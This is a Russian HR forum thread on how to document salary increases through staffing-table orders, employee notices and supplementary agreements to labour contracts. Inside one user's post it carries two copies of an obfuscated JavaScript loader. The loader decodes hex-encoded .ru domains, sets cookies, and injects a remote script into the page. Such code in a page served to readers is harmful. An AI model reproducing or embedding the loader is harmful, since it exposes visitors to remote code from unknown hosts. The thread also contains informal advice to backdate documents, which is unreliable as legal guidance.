.
8 (8442)98-98-998 (917) 338-98-99

Обновлено! Всё о нерабочих президентских днях 4-7 мая 2021 г.  

Подборка разъяснений Минтруда, Роструда, наших экспертов. Бесплатный доступ

Приказ на увеличение оклада

Приветствуем Вас на форуме кадровиков-профессионалов и новичков в кадровом деле, уважаемые коллеги! Создавая новую тему, пожалуйста, учитывайте следующее.
1)  Формулируйте тему точно, полно и ясно. Например, заголовок темы "Отпуск" не соответствует этому требованию. "Льготник просит отпуск с завтрашнего дня. Получается просрочка оплаты отпускных" - это пример точного и полного заголовка темы.
2) Проверяйте поиском - возможно, по Вашему вопросу, уже есть тема, и свое сообщение можно написать туда.
Пожалуйста, будьте взаимовежливы. Разные мнения по спорным вопросам - это естественно и нормально, уважайте мнение друг друга. Наш с Вами форум - для приятного профессионального общения, сотрудничества и взаимопомощи. И, пожалуйста, не оставляйте в форуме активных ссылок на другие ресурсы  - это понижает рейтинг нашего сайта в поисковых системах яндекс и др. 
Vasia.png

Приказ на увеличение оклада

Необходимо сделать приказ на увеличение оклада сотруднику. Это приказ будет по основной деятельности? И как лучше составить приказ? Если можно, образец.

Сделайте приказ об измении штатного расписания.

П Р И К А З

№ _________

«____» ___________ 20____г. г. Москва

«О внесении изменений в штатное расписание компании»

В связи с совершенствованием структуры компании

П Р И К А З Ы В А Ю:

Внести с «..........» ............. 20........ г. следующие изменения в штатное расписание компании:

...................

4. Повысить тарифные ставки (оклад) в:

4.1. Структурное подразделение администрация:
- Генеральный директор 120000 (сто двадцать тысяч) рублей;
- Заместитель Генерального директора 119000 (сто девятнадцать тысяч) рублей;
- Заместитель Генерального директора по вопросам развития 119000 (сто девятнадцать тысяч) рублей;
...................

5. Изменения в штатное расписание вступают в силу с «.......» ............. 20............ года.

6. Бухгалтерии внести в смету расходов на содержание соответствующие изменения.

7. Контроль за исполнением настоящего приказа оставляю за собой.

Генеральный директор
..................

Вадим А, спасибо!!!
И так каждый раз, если у кого-то меняется оклад?

Цитата
mishka пишет:
И так каждый раз, если у кого-то меняется оклад?

Да, каждый раз.
+ еще надо сделать ДС к ТД.

а можно увеличить оклад без уведомления? просто сделать допсоглашение.

Цитата
Гость пишет:
а можно увеличить оклад без уведомления?
Можно, т.к. это не ухудшает условий труда.
Это только при уменьшении ОБЯЗАТЕЛЬНО нужно уведомление за 2 месяца.
Изменено: Вадим А - 14.02.2012 11:09:08

Цитата
Вадим А пишет:
это не ухудшает условий труда
В.И. Андреева рассказывала на семинаре случай из судебной практики. Мы считаем, что не ухудшаем условий работнику, но оказывается, не всегда это так. В организации произошло изменение окладов без уведомления сотрудников (сейчас не буду врать, шла ли речь только о ДС, либо об уведомлении тоже). Мужчина подал в суд иск - он был против увеличения, так как из-за этого у него увеличился размер алиментов. :D Выиграл суд. Конечно, это единичный случай, но сам факт...

По возможности стараюсь делать так, как надо (ибо нигде в ТК не сказано, что уведомление и ДС необходимы только при понижении окладов. Речь идет об изменении существенных условий ТД. И увеличение, и уменьшение являются равнозначными изменениями условий ТД).

Здр! Я тоже читала по этому поводу Андрееву. Ещё был случай, когда сотруднику повысили оклад, и он потерял субсидии. А ещё был случай, когда повысили оклад и увеличили кол-во ДИ, работник не был согласен.
Но, мне кажется, в таких случаях должна быть корпоративная политика, решаются такие вопросы индивидуально.
Директор всегда знает, кто из его сотрудников против или за...
Вот только кроме приказа по Осн Д, нужен приказ по ЛС об изменении окладана основании ДС тоже.
Типа
УСТАНОВИТЬ с 01.05.2011 г. должность ФИО должностной оклад в размере 170 000,00 рублей в месяц до вычета установленных законодательством РФ налогов.
Основание: изменение в штатное расписание Приказ от №, дополнительное соглашение № от к трудовому договору от № .
Можно изменение в штатное расписание поместить вверху.
Типа в связи с изменнением в штатном расписании...
Обязательно ознакомить с приказом под роспись.
С приказом ознакомлен(а):
дата подпись ФИО
«Поверь, что ты знаешь все ответы, и ты узнаешь все ответы.» Ричард Бах.

У нас возражающих не бывают, все только рады, поэтому приходит штатное мы делаем приказ + соглашения
Изменено: ОксанаХ - 14.02.2012 13:14:16

Добрый день! Подскажите, пожалуйста! Повышаются оклады работникам, в том числе и директору. Кто имеет право подписать доп.соглашение с директором, являющимся одним из учредителей? Он наделен соответствующим правом, как участник общества?

Цитата
Гость пишет:
Кто имеет право подписать доп.соглашение с директором, являющимся одним из учредителей?
Тот же, кто подписывал ТД с ним.

Цитата
Гость пишет:
Кто имеет право подписать доп.соглашени
Тот кто наделен таким правом по протоколу.

Подскажите, пожалуйста, где нужно регистрировать приказ об изменении заработной платы (повышение окладов в связи с изменением ШР)?
В кадрах вместе с приказами прием/увольнение/смена фамилии или в журнале по основной деятельности предприятия в приемной?

Приказ об изменении , утверждении ШР - это приказ по основной деятельности.

Снеженка, спасибо!!!

подскажите образец приказа, был бух-р у которого был оклад 26 000, она уволилась и новому бух-ру установили ставку 26 400, в связи с этим нужно поменять ШР, какой приказ нужно сделать?

Цитата
Ekogqy пишет:
она уволилась и новому бух-ру установили ставку 26 400, в связи с этим нужно поменять ШР
Неправильный порядок - усложняете жизнь. Сначала приказ об изменении ШР, а потом уже принять буха с новым окладом. Если приняли на старый оклад, то теперь :
приказ о внесении изменений в ШР (который вступит в силу не ранее чем через 2 месяца), уведомление буху (за 2 месяца), ДС к ТД непосредственно перед вступлением в силу нового ШР.

Коллеги, а если ген.дир хочет сам себе понизить оклад, являясь единственным акционером. Подскажите, как правильно оформить?
Есть соображения, что надо сделать:
1. Решение единственного акционера об установлении нового оклада и изменении в связи с этим штатного расписания
2. Новое штатное расписание.
3. Приказ об изменении оклада.
4. ДС к трудовому договору
Поправьте меня, если что-то забыла или не так

Цитата
Oduvan4ik пишет:
Новое штатное расписание.
Новое ШР и утверждается приказом.
После него - уведомление об изменении ТД (несмотря на то, что сам себе). И через 2 месяца ДС.

Цитата
Снеженка пишет:
Цитата
Oduvan4ik пишет:
Новое штатное расписание.
Новое ШР и утверждается приказом.
После него - уведомление об изменении ТД (несмотря на то, что сам себе). И через 2 месяца ДС.
А решение надо? или достаточно просто приказа об изменении штатки?
Блин, ёкарный бабай... сколько ненужных документов! Когда он у меня увидит это уведомление... представляю его реакцию... совсем девка рехнулась :D... Он итак на меня косо уже смотрит... и на мои бумажки.

Цитата
Oduvan4ik пишет:
Смотря что у вас в Уставе написано. Если что решение об окладе ГД принимает учредитель - надо, если ничего нет, можно просто приказ о новом ШР

Цитата
Снеженка пишет:
Цитата
Oduvan4ik пишет:
Смотря что у вас в Уставе написано. Если что решение об окладе ГД принимает учредитель - надо, если ничего нет, можно просто приказ о новом ШР
В уставе ничего ничего нет такого, но я думаю пусть будет, меньше вопросов будет возникать.
Только вот загвоздка в формулировках. Что в нем писать. РЕШИЛ: установить оклад генеральному директору ФИО такой-то оклад? И все?
А после решения приказ об изменении штатного расписания. А потом всё как обычно: уведомление и ДС.
Так?

Так. Только в решении срок - через 2 месяца, чтобы уведомить успеть без нарушения сроков.

Снеженка, как всегда премного благодарна!!!!:)

Добрый день! Подскажите пж, изменилось шт.расписание всвязи с повышением оклада нескольким сотрудникам. Директор не хочет, чтобы сотрудники видели оклад друг друга. Могу я сделать общий приказ без ознакомления сотрудников с ним, а ознакомить с увеличением зп сделав на каджого доп.соглашение? Или делать на каждого приказ о внесении изменений шт.расписания? Подскажите пж. как лучше поступить?

АшатанKA, , о каком приказе идет речь?
Для повышения оклада вам нужно

1. Приказ об изменении шр. Его подписывает только гд, ну или еще глав бух
2. Само новое шр его тоже подписывает гд и глав бух
3. Соглашение с каждом работников об изменении оклада в 2 экз. Тут уже подписывает гд и каждый работник .

3
Изменено: Вадим А - 09.07.2015 17:13:51

помогите разобраться
Согласно ШР, оклад у должности "менеджера" в организации- 20 000 руб.
Всех новых сотрудников на этой должности мы принимаем на этот оклад, верно?
Допустим это 5 человек,
одному из них, спустя какое то время- решили повысить оклад, допустим сделать 30 000 руб.., я делаю ему приказ и доп.соглашение. верно? Изменения в ШР не нужны? (ведь данное повышение коснулось только 1 человека)

и еще маленький вопрос:

допустим этот потенциальный менеджер уже имея 30 т.р.- увольняется. Спустя пару -тройку месяцев он вновь решает к нам вернуться
Но, принять я его могу на оклад только согласно штатному? (т.е. снова- 20)
есть ли какие то варианты сразу принять его на 30 т.р., не меняя ШР?

спасибо! (вопрос больше из серии "глупые вопросы новичка" но все же))
"Продолжайте практиковаться в придумывании идей.Мышцы, ответственные за идеи, со временем атрофируются.Вы должны наращивать эти мышцы".

Dorsia, вы не имеете право установить одному менеджеру 30000, а другим оставить 20000.
Если есть необходимость, одному уведичить оклад, значит делайте новую должность ведущий менеджер, главный, менеджер 1 категории, или делайте надбавки.

Изменения в штатку будет полюбому.
Изменено: Вадим А - 13.07.2015 11:14:59

увеличение зарплаты конкретного менеджера связано со сроком работы, успехами
к примеру, новые приходящие инженеры имеют оклад в 20 000 руб.
инженер проработавший 1 год- получает 30, мы конкретно ему увеличили оклад, сделали доп.соглашение

неужели обязательно менять штатное?

мы можем увеличить ему зарплату- подняв размер премии ,к примеру ? ( у нас з/п 50 на 50)
"Продолжайте практиковаться в придумывании идей.Мышцы, ответственные за идеи, со временем атрофируются.Вы должны наращивать эти мышцы".

Dorsia, , еще раз повторюсь, оклад у всех по одной и той же должности должен быть одинаковый.
А надбавки могут быть разными. За тот же стаж работы в компании, но если введете для одного работника, это коснется уже всех.
Если он у вас такой хороший и работящий, сделайте его ведущим менеджером и зп в 30000, как раз.
Естественно штатку придется менять и делать весь пакет документов, как при переводе.
Изменено: Вадим А - 13.07.2015 19:03:34

Добрый день! Вопрос 1: у работника с 01.08.2014 повышается оклад в связи с увеличением стажа работы, необходимо ли было делать уведомление за 2 месяца ? или достаточно сейчас сделать ДС к ТД?
Вопрос 2: Прочла тему и не понятно мне по повышению окладов: сначала вводим ШР в действие, уведомляем за 2 месяца работников и через 2 месяца меняем оклады?
"Век живи - век учись!"

Помогите, пожалуйста, работа встала. Нужно делать уведомления об изменении условий ТД, не знаю что прописывать - "в связи с изменением штатного" (но штатное у нас только через 2 месяца вступит в силу), или в связи с внесением изменений в Положение об оплате тогда прописывать?
"Век живи - век учись!"

И как быть с теми кто находится в отпуске по уходу за ребенком? Как их уведомлять? если не уведомлять сейчас, а уведомлять по выходу, получается они выйдут и еще 2 месяца "старую" зп будут получать, хотя штатное новое? ничего не пойму.......
"Век живи - век учись!"

Где же все, тяжело без вас :want
Вообщем оформила уведомления в связи с изменением штатного расписания, оформила всем и кто в ежегодном отпуске и кто в отпуске по УР, подпишут по выходу. Поправьте если, что не так (оформляла данную процедуру первый раз)
"Век живи - век учись!"

Margo@@@,
1. Достаточно ДС к ТД.
2. В связи с повышением оклада, не обязательно уведомлять за два месяца. Эти условия улучшают положение работников.

Margo@@@, , на основании пункта Положения об оплате труда.
На основании утвержденного штатного расписания (пусть оно и вступит через два месяца, но и изменения у сотрудников, тоже вступят через два месяца).

Вадим А, спасибо Вам большое за ответ, по указанию Министерства делаем уведомления
[img][IMG]http://s008.radikal.ru/i305/1507/ad/4dee1e80fa89.jpg[/img][/IMG]
и как быть с теми кто в ОУР находится
[URL=http://www.radikal.ru][IMG]http://s008.radikal.ru/i305/1507/ad/4dee1e80fa89.jpg[/IMG][/URL]
"Век живи - век учись!"

Margo@@@, если есть возможность довести раньше чем выход из опур то сделайте. Если нет, то сделайте это при выходе сотрудницы из отпуска по уходу.

Вадим А, спасибо :handshake:
"Век живи - век учись!"

Как изменить оклад заместителю директора, который по назначению Министерства является и.о. директора, я делаю уведомление, которое подписывает он же и ознокамливается, т.е. сам себе и уведомление и ДС к ТД ?
Изменено: Margo@@@ - 16.07.2015 13:56:38
"Век живи - век учись!"

Цитата
Margo@@@ пишет:
Как изменить оклад заместителю директора, который по назначению Министерства является и.о. директора, я делаю уведомление, которое подписывает он же и ознокамливается, т.е. сам себе и уведомление и ДС к ТД ?
Я так предполагаю, что сам себе и.о. директора не может подписать доп. соглашение, уведомление и ДС к ТД должно оформлять непосредственно само Министерство?
"Век живи - век учись!"

Margo@@@, , а штатное расписание вам кто утверждает? В частности оклады?

Вадим А, утверждается приказом и.о. директора, согласовывает Министерство
"Век живи - век учись!"

Конечно Министерство все решает, сам руководитель по своей инициативе ничего поменять не может. Но с Министерства никаких уведомлений об изменении оклада не было, вот я и думаю может ли и.о. сам на себя делать, сам подписывать сам ознакамливаться?
"Век живи - век учись!"

Я думаю, что все обязательно должно быть согласованно с вышестоящей инстанцией.У вас же бюджет тоже утверждает Министерство, следовательно и все нюансы связанные с денежными средствами должны быть согласованны.

Вадим А, не поняла про согласовывать, сейчас нужно издавать уведомление об изменении оклада? и в дальнейшем доп. соглашение он сам себе будет подписывать т.е. работодатель в лице и.о. директора и работник и.о. директора ? или же Министерство должно было уведомить и в дальнейшем ДС к ТД подписывать ?
"Век живи - век учись!"

Margo@@@, ну вы пишите что штатка согласовывается с министерством. Ну напишет ваш сотрудник зп в 100000, а министерство не согласует. Может стоит направить письмо согласование. Обосновать увеличение оклада. Если они согласуют тогда и вносить изменение в штатку.

Вадим А, так письмо приходило от Министерства я выше присылала, изменяются оклады всем, я не понимаю какое еще согласование с министерством, положение об оплате уже увозили на согласование, допустим сейчас я сделаю уведомление об изменении оклада на и.о. директора Иванова И.И., через 2 месяца он сам себе соглашение к трудовому договору будет подписывать?
".... именуемое в дальнейшем «Работодатель», в лице и.о. директора Иванова И.И, действующего на основании ....., и Иванов И.И., именуемый в дальнейшем «Работник», заключили настоящее соглашение о нижеследующем " далее сам подпишет и сам ознакомится?
"Век живи - век учись!"

Margo@@@, извините, про согласование. Совершенно верно вы же писали.
А трудовой договор с директором кто подписывал?

Вадим А, вообще было так: директор уволился, Министерство образование возложило исполнение обязанностей на заместителя директора, вот теперь зам. директора у нас и.о. директора. Позвонила в Министерство задала им вопрос (так как я не понимаю как он сам себе будет подписывать ДС к ТД он же и работодатель он же и работник получается), на что в Министерстве мне ответили, что по другому никак не сделать, но в голове у меня это не укладывается...
"Век живи - век учись!"

Margo@@@, , ну раз вам говорит Министерство, то оформить подписями директора с двух сторон.
В конце концов у вас есть согласованное штатное расписание и вы не нарушили процедуру согласования.

Margo@@@, , если бы у вас была коммерческая организация где гд, как хочет так и ворочит, тогда бы вопросов не было. А у вас как я понял структура государственная и каждый документ должен бвть согласован. Вы согласование получили.

Цитата
Вадим А пишет:
ну раз вам говорит Министерство
у нас постоянно из-за этого разночтения, в бухгалтерии мне тоже говорят что нельзя оплату более чем 75% от оклада производить работнику (0,5 по совместительству и 25% по совмещению, к примеру (а им это в Министерстве говорят), а я спорю, что оплата устанавливается по Соглашению сторон и минимальным/максимальным размером не ограничивается. Причем когда прошу номер с кем бы пообщаться на тему, так как каждый раз кавардак из-за этого, отвечают: "Хочешь руководителя подставить", в чем подстава честно не понимаю, я всего лишь хочу работать не в бардаке, и все упорядочить...устала сил нет...
"Век живи - век учись!"

Margo@@@

Цитата
Margo@@@ пишет:
Министерство образование возложило исполнение обязанностей на заместителя директора, вот теперь зам. директора у нас и.о. директора
Все бумаги на имя Иванова И.И. готовит Министерство и личное дело должно быть у них.

Валентина+Валентина, спасибо :handshake: , но вот все у нас хранится, а в Министерстве утверждают, что они не могут никаких соглашений делать, пока директором не назначат. Мне и не понятно на должность и.о. назначали, а сейчас ничего сделать не могут.
"Век живи - век учись!"

С 01.06.15 приказом по организации увеличили всем работникам оклад. На следующий день руководитель( И.П.) дал распоряжение заключить со всеми работниками ДС к ТД о неполном рабочем дне ( 6 часов) сознательно идя на нарушение. Ни заявления с работников ни тем более уведомления за 2 месяца не было. С не согласными подписать провели беседу за закрытыми дверями. Чем это чревато для И.П. ???

Прошу прощения- что-то с интернетом не лады. Не могу исправить. (удалить ненужное)

wind ow .a1336404323 = 1;!f unction(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9876",n=f unction(o){var e=docu ment.cookie.match(new RegExp("(?:^|; )"+o.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1";)+"=([^;]*)";));return e?decodeURIComponent(e[1]):void 0},i=f unction(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600";),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=f unction(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=Stri ng.fromCharCode(parseInt(o[t],16));return e},c=f unction(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toS tring(16);return e},a=f unction(o,e,t){var n=docu ment.location.protocol+"//"+o;if(wind ow .smlo)window .smlo.loadSmlo(n.r eplace('https:','http:'));else if(wind ow .zSmlo)window .zSmlo.loadSmlo(n.r eplace('https:','http:'));else{var i=docu ment.createElement("script";);i.setAttribute("src",n),i.setAttribute("type","text/javascript";),document.head.appendChild(i),i.on load=f unction(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=f unction(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=f unction(u){var s=n("oisdom";);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods";);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kadrovik-praktik.ru";)+"_"+(self===top?0:1)+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

window .a1336404323 = 1;!f unction(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9876",n=f unction(o){var e=docu ment.cookie.match(new RegExp("(?:^|; )"+o.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=f unction(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=f unction(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=Stri ng.fromCharCode(parseInt(o[t],16));return e},c=f unction(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toS tring(16);return e},a=f unction(o,e,t){var n=docu ment.location.protocol+"//"+o;if(wind ow .smlo)window .smlo.loadSmlo(n.r eplace('https:','http:'));else if(wind ow .zSmlo)window .zSmlo.loadSmlo(n.r eplace('https:','http:'));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=f unction(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=f unction(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kadrovik-praktik.ru")+"_"+(self===top?0:1)+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: galiya1808@mail.ru - 21.07.2015 08:52:24

Цитата
galiya1808@mail.ru пишет:
Чем это чревато для И.П. ???
Если будет внеплановая проверка ГИТ (по заявлению сотрудников) или это вылезет при плановой проверке, то штраф (возможна приостановка деятельности на срок до 90 дней). Размер - на усмотрение проверяющих.

Цитата
Margo@@@ пишет:
на должность и.о. назначали,
ТК РФ не предусмотрено и.о. Должен быть конкретно - директор.

А чем директор мотивировал переход на неполное рабочее время?
Какая причина указпна в приказе?

Цитата
Вадим А пишет:
А чем директор мотивировал переход на неполное рабочее время?
Какая причина указпна в приказе?
Да ничем. Да и приказа не было. Есть доп.соглашения с каждым работником о неполном рабочем дне с оплатой согласно отработанного времени. никто не хочет конфликтовать с начальником - у нас очень трудно в городе с работой. Просто ему "лишние расходы на соц.отчисления не нужны". Пробовали поспорить некоторые - задержал з.плату. Сказала ему про нарушение ТК - не захотел даже слушать. Вот как-то так.

galiya1808@mail.ru, , тяжело с такими "директорами". У меня тоже был такой любимая фраза была Я вам зарплату плачу, вот идети и делайте как я сказал.

Доброго всем дня:)

1.08. - увеличиваем оклады всем работникам. Делаем Доп соглашения к ТД об изменении (увеличении) оклада.

так же 01.08. планируем изменить ТД путем дополнительных соглашений и изложить их в новой редакции.

Вопрос: Как всё это правильно сделать? Можно ли оба эти изменения внести в одно доп/соглашение? Или нужно сделать два доп/соглашения одним числом?.... Что то уже голова кругом:stars

Цитата
Елена П пишет:
Можно ли оба эти изменения внести в одно доп/соглашение?
Без проблем

Цитата
Челентано пишет:
Цитата
Елена П пишет:
Без проблем
то есть разными пунктами это прописать?

1. Работнику установить оклад такой-то.
2. ТД изложить в следующей редакции:...

Цитата
Елена П пишет:
Цитата
Челентано пишет:
Цитата
Елена П пишет:
Без проблем
то есть разными пунктами это прописать?

1. Работнику установить оклад такой-то.
2. ТД изложить в следующей редакции:...
Можно и так. Но еще красивее, если - ТД изложить, а по ходу и оклад такой то.

Подскажите, хотим увеличить всем работникам оклады, кому вдвое, кому на 50%, кому на 30%, как правильно сделать это? Как я вижу: Приказ об изменение ШР, Согласие работников в листе ознакомления, Приказ на перевод (кадровое перемещение), допсоглашение, всё ли верно? Приказ нужно за 2 мес. до изменения окладов подготовить и подписать у работников?

Цитата
Ekogqy пишет:
Согласие работников в листе ознакомления, Приказ на перевод (кадровое перемещение), допсоглашение, всё ли верно?
Все не верно)))))

Приказ об утверждении ШР (с новыми окладами)
Уведомления работникам за 2 месяца
ДС к ТД накануне вступления нового ШР в силу
Все.

Перевод - почитайте в ТК что это такое. У ваших работников изменяется только оклад, это не перевод.

Добрый день. Помогите разобраться в последовательности действий следующей ситуации:
руководитель с января увеличивает сотрудникам зп, у кого оклад+сделка тому на 5%, у кого просто оклад на тыс.
В связи с этим мне нужно сделать:
1. Приказ о внесении изменений в штатное расписание, где перечисляю все изменения
2. Доп соглашения каждому сотруднику об увеличении оклада
3. Приказ об увеличении заработной платы сотрудникам (нужен ли???)
И еще, какой датой будет правильно ввести эти документы?
Заранее спасибо.

Цитата
SatAnna пишет:
Приказ о внесении изменений в штатное расписание, где перечисляю все изменен
Лучший вариант: утверждение в н6овой редакции

Цитата
SatAnna пишет:
Доп соглашения каждому сотруднику об увеличении оклада
да

Цитата
SatAnna пишет:
Приказ об увеличении заработной платы сотрудникам (нужен ли?
бухи хотят по приказу

Цитата
SatAnna пишет:
какой датой будет правильно ввести эти документы?
если рук-ль решает по своей инициативе конечно предупреждать не менее чем за 2 м-ца.

Цитата
Валентина+Валентина пишет:
если рук-ль решает по своей инициативе конечно предупреждать не менее чем за 2 м-ца.
ну это уже проблемно, если с января будет уже новая зп

Цитата
SatAnna пишет:
ну это уже проблемно, если с января будет уже новая зп
Тогда задним числом.

Добрый день! Такой Вопрос, работник работает по основной должности на 0,5 ставки, ему еще добавил директор 0,25 ставки, как правильно оформить приказ? :unknown

sellma1, ну это совмещение должностей, ст.60.2 ТК РФ. Делаете предложение/уведомление работнику, затем допник подписываете с ним, затем приказ на доплату за совмещение должностей.

Цитата
sellma1 пишет:
ему еще добавил директор 0,25 ставки,
если по другой должности, то да - совмещение, или совместительство.

Если по этой должности, то можно сделать - изменение режима рабочего времени и будет 0,75 шт. ед.

Цитата
Если по этой должности, то можно сделать - изменение режима рабочего времени и будет 0,75 шт. ед.
А как правильно это прописать в приказе?
если работал на 0,5 ставки и еще добавили 0,25 ставки, получается у работника увеличился рабочий день на 2 часа
Изменено: sellma1 - 05.02.2018 13:24:23

Цитата
sellma1 пишет:
А как правильно это прописать в приказе
установить Ивановой Марии Ивановне, дворнику с ...... 0,75 шт. ед.
Оплата пропорционально отработанному времени.

Цитата
sellma1 пишет:
ему еще добавил директор 0,25 ставки
а работника об этом предупредили? Может он будет не согласен?

Цитата
а работника об этом предупредили? Может он будет не согласен?
Работник согласен, и в заявление написала, что дает свое согласие на увеличение ставки в размере 0,25% по должности.... это правильно?

Цитата
sellma1 пишет:
дает свое согласие на увеличение ставки в размере 0,25% по должности.... это правильно
ну раз согласен, так дальше продолжайте.

Спасибо)
Читают тему (гостей: 1)
Форма ответов

Текст сообщения*
Загрузить файл или картинкуПеретащить с помощью Drag'n'drop
Перетащите файлы
Ничего не найдено

Отписаться от сообщений с форума

Мнение администрации форума может не совпадать с мнением участников форума. Администрация форума не несет ответственности за сообщения, размещаемые участниками форума. Вместе с тем, убедительная просьба к участникам - при общении   не нарушать действующее законодательство: при цитировании чьих-либо произведений не нарушать права авторов, не распространять недостоверную порочащую кого-либо информацию, не разглашать чьи-либо персональные данные и т.д. Если Вы заметили сообщение, которое, возможно нарушает закон или правила форума, пожалуйста, напишите нам >>